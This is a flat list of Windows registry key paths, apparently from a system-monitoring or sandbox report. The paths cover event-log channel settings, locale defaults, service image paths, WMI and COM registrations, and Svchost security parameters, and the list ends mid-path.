HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ChannelAccess HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ChannelAccess HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ChannelAccess HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\cval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application\SecurityCenter\ProviderGuid HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ChannelAccess HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ChannelAccess HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\DCOM\ProviderGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics\DFDCollectorInvokeTimes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxSessionSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxEventSizePerSession HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\AdaptiveSqm\ManifestInfo\Version HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\SamplingInterval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastRunTime HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\SQMLogger\Start HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName HKEY_USERS\.DEFAULT\Control Panel\International\sCountry HKEY_USERS\.DEFAULT\Control Panel\International\sList HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal HKEY_USERS\.DEFAULT\Control Panel\International\sThousand HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime HKEY_USERS\.DEFAULT\Control Panel\International\s1159 HKEY_USERS\.DEFAULT\Control Panel\International\s2359 HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate HKEY_USERS\.DEFAULT\Control Panel\International\iCountry HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize HKEY_USERS\.DEFAULT\Control Panel\International\iDigits HKEY_USERS\.DEFAULT\Control Panel\International\iLZero HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber HKEY_USERS\.DEFAULT\Control Panel\International\NumShape HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater\Id HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Refresh HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\ImagePath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\advapi32.dll[MofResourceName] HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\KnownSvcs HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\EnableFileTracing HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\FileTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\EnableConsoleTracing HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\ConsoleTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\MaxFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\FileDirectory HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ProcessID HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ServiceParameters HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RunAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ActivateAtStorage HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ROTFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppIDFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RemoteServerName HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\SRPTrustLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\PreferredServerBitness HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LoadUserSettings HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\LocalServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\ServerExecutable HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AppID HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalService HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\DllSurrogate HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\RunAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\ActivateAtStorage HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\ROTFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AppIDFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LaunchPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\RemoteServerName HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\SRPTrustLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\PreferredServerBitness HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LoadUserSettings HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\ActivationFailureLoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\CoInitializeSecurityParam HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\ImpersonationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\AuthenticationCapabilities HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 